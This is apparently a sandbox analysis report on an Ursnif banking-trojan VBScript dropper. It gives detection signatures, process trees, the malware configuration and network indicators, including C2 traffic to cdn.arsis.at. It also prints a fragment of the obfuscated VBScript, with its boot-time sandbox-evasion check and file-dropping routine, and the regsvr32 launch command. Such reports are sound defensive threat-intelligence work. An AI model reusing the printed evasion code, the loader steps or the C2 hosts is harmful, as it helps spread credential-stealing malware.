
Analysis Report view_presentation#_52197.vbs

Overview

General Information

Sample Name: view_presentation#_52197.vbs
MD5: 0eaf069ed296fade8d7a8e2df601b008
SHA1: bd7d4a645643b0661f52e277be6a0ed40a111740
SHA256: 86405cce34317c8ea22428238f8a79e96b3e2c7e417a2279038dee3dbb77f580

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5484 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5596 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5588 cmdline: -s C:\Users\user\AppData\Local\Temp\share.pea MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5028 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2820 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "307", "system": "ea69fb5c343103617cab0e150d800b31@", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593042348", "user": "31b341dd54c8a3b79c4b2eb5ed206b91", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started, Author: Florian Roth, Data: Command: -s C:\Users\user\AppData\Local\Temp\share.pea, CommandLine: -s C:\Users\user\AppData\Local\Temp\share.pea, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5596, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\share.pea, ProcessId: 5588

Signature Overview

AV Detection:

Found malware configuration
Source: regsvr32.exe.5588.3.memstr, Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "307", "system": "ea69fb5c343103617cab0e150d800b31@", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593042348", "user": "31b341dd54c8a3b79c4b2eb5ed206b91", "hash": "0x00000000", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at, Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\share.pea, Virustotal: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\share.pea, ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: view_presentation#_52197.vbs, Virustotal: Detection: 8%
Source: view_presentation#_52197.vbs, ReversingLabs: Detection: 16%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\share.pea, Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BE258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View, IP Address: 88.99.66.31
Source: Joe Sandbox View, ASN Name: unknown
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic, HTTP traffic detected:
    GET /api1/enifBZeeo/w3KzFaeh6LAMrUHY60UP/d_2BvFI4RiT3bjlqSap/TPIx0eRKVYwzRlg4wpqySC/bepW5cN2GDlkY/NICwNucs/W0ZVQFKVfywvFCwajqHrWcU/a5uICKiysp/nbJWY2W9CTgUpWn0D/H6CpJGKSi7_2/BRksJYYjSsH/69pntuthfj6Tm_/2BGiIvkEjUX4Q2h7BSyGi/OzY4YuOFgp0ytbuu/K65rPn4UZtibx4W/v9kBxqmY3p9BziO95r/BFXVPmOKY/e_0A_0DACpty_2FdlXE2/91_2FRSZoEES_2FPk2x/wRsyIod_2Fk4ExqtfeBXaQ/s4ygL2BZVjNoZ5z/64hDM9K HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: cdn.arsis.at
    Connection: Keep-Alive
Source: msapplication.xml0.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xac0ecb8d,0x01d64a81</date><accdate>0xac0ecb8d,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xac0ecb8d,0x01d64a81</date><accdate>0xac0ecb8d,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xac1651a2,0x01d64a81</date><accdate>0xac1651a2,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xac1651a2,0x01d64a81</date><accdate>0xac18da05,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xac1b890e,0x01d64a81</date><accdate>0xac1b890e,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xac1b890e,0x01d64a81</date><accdate>0xac1b890e,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown, DNS traffic detected: queries for: iplogger.org
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 24 Jun 2020 14:45:54 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmp, String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmp, String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmp, String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmp, String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmp, String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmp, String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: msapplication.xml.11.dr, String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.11.dr, String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.11.dr, String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.11.dr, String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.11.dr, String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.11.dr, String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.11.dr, String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.11.dr, String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.822612116.0000022D68ED3000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bD467
Source: wscript.exe, 00000000.00000003.822612116.0000022D68ED3000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bP467
Source: wscript.exe, 00000000.00000003.810134979.0000022D69F00000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bP467o
Source: wscript.exe, 00000000.00000003.821164281.0000022D69E01000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bP467pace
Source: wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/Inz
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF15F3 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF18DB GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF2775 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BE3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BEAEB5 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF2554
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BEAC94
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BE15D6
Source: view_presentation#_52197.vbs, Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Source: classification engine, Classification label: mal100.bank.troj.evad.winVBS@7/17@2/2
Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs'
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe, File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: view_presentation#_52197.vbs, Virustotal: Detection: 8%
Source: view_presentation#_52197.vbs, ReversingLabs: Detection: 16%
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs'
Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea
Source: unknown, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\share.pea
Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\share.pea
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: view_presentation#_52197.vbs, Static file information: File size 1155325 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Source: Binary string: c:\West\open\close\allow\Claim\neck\horse\bring\girl.pdb source: wscript.exe, 00000000.00000003.795866192.0000022D68EED000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1195299092.0000000073018000.00000002.00020000.sdmp, share.pea.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe, Anti Malware Scan Interface:
    WScript.ScriptName, cStr(762469371)) > 0 And Delano = 0) Then
    ' ferruginous bub impetuous sunk tilth melodrama636, diminutive Bellamy drought disambiguate. furrow loam specimen Myra petticoat Eliot jargon betoken, 1078986 cardboard Quantico sequin puck releasable Talmudic sue ostensible Thompson Noreen941 cryptogram taut swum simian product, 4632214 Larsen Paulo legatee transshipping Stanhope Chao cheetah Madeira splendid material ideology Parisian delinquent Schumann fain681 Orwell
    Exit Function
    End If
    ' major foamy quota maritime Abelson interrogatory imaginate photolytic prison Idaho Fullerton soutane102
    set pietism = GetObject("winmgmts:\\.\root\cimv2")
    set YipPG = pietism.InstancesOf("Win32_OperatingSystem")
    for each Cornell in YipPG
    tE = Cornell.LastBootUpTime
    uDD = Mid(tE,1,4) & "-" & Mid(tE,5,2) & "-" & Mid(tE,7,2) & " " & Mid(tE,9,2) & ":" & Mid(tE,11,2) & ":" & Mid(tE,13,2)
    ' waxwork, 9664912 parallelogram. patron churchwomen middle Brenner reversible stockroom requisite phenomena candlelight almighty matron, 83899 Charlottesville practise Geiger improve delectate defiant Spirogyra discern betide might
    AnHec = abs(datediff("s",uDD,now))
    ' yesterday, genii canoe, bimetallic seclude. heifer mandate. funny nectar module divan waterside hidalgo homologue Bloomfield jumble. Becky goody kink immune playhouse barony distaff relieve cavort weal trinitarian bandstand442 trailblazer inquisitor aflame. 5073367 melanoma onto conclusion, 9529084 synecdoche indistinguishable bedspring
    goXdE = AnHec \ 60
    vacuolate = goXdE \ 60
    REM note selfish consortium surgery floorboard eutrophication immemorial
    goXdE = goXdE mod 60
    AnH = AnH mod 60
    If (vacuolate = 0 And goXdE < 10) Then
    MM118
    End If
    next
    REM Fermat colic hump Yates publication landslide offhand septic lengthy teach transcription isinglass bedspread pole trainmen tallyho immature Cohn Hearst profile
    End Function
    Function forbore(pan385, bullish294)
    REM bipedal drone actinolite, Garrisonian shoelace mealtime, 8483643 foldout grave chrysalis. doodle organismic pattern swam corrigendum FMC caterpillar Beckman betatron Mattson crucifix weighty Clinton justiciable908 Lubell tuberculin bureaucratic engine Jimmie palsy Reuben warehousemen convulsion wry argue, Vought Mbabane intangible swift Berlitz rapture diorama Chablis sank sit
    Dim flesh, ar
    Set flesh = CreateObject("Scripting.FileSystemObject")
    REM jettison gelatinous Phipps, pediatric etude officeholder Jeffrey viburnum composite obsess, basidiomycetes, 9381873 grease Poisson stove suzerain commune impedance Attica Avernus ping summer tektite Politburo blindfold ruby Volstead implementation analogue garland associable spay caution contention bone complementarity servant polytope funny813 mug sabotage septillion didnt
    Set ar = flesh.CreateTextFile(pan385, True)
    Dim YyaDY: YyaDY = (418 - ((123 - 2.0) - (71 - 68.0)))
    Dim astute301: astute301 = (((1041 - 759.0) - 146.0) - (137 - 1.0))
    For Each Eb In bullish294
    Randomize
    cheetah412 = Int((YyaDY-astute301+1)*Rnd+astute301)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF24F0 push ecx; ret 3_2_72FF24F9
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72FF2543 push ecx; ret 3_2_72FF2553
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BEAC83 push ecx; ret 3_2_02BEAC93
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BEED26 pushfd ; retf 3_2_02BEED36
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BEA950 push ecx; ret 3_2_02BEA959
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_7300450B push edx; retf 3_2_73004512
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73004728 push ss; iretd 3_2_73004730
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73003990 push ecx; retf 3_2_730039DF
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73003992 push ecx; retf 3_2_730039DF
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_730075DF push dword ptr [ebp-04834675h]; iretd 3_2_730075E9
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73006FF3 push 00000019h; iretd 3_2_73006FF6
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73004018 pushfd ; retf 3_2_7300401B
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73005041 push ss; iretd 3_2_73005044
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_73006276 push edx; retf 3_2_73006277

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\share.pea
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\share.pea

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe, File deleted: c:\users\user\desktop\view_presentation#_52197.vbs
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_3-4718)
Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_3-4554)
Source: C:\Windows\System32\wscript.exe, TID 4188 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02BE258E Wow64EnableWow64FsRedirection, RtlAllocateHeap, RtlAllocateHeap, RtlAllocateHeap, memset, CreateFileA, GetFileTime, FindCloseChangeNotification, StrRChrA, lstrcat, FindFirstFileA, FindFirstFileA, CompareFileTime, CompareFileTime, FindClose, FindNextFileA, FindClose, FindFirstFileA, CompareFileTime, StrChrA, memcpy, FindNextFileA, FindClose, FindFirstFileA, CompareFileTime, FindClose, HeapFree, HeapFree 3_2_02BE258E
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
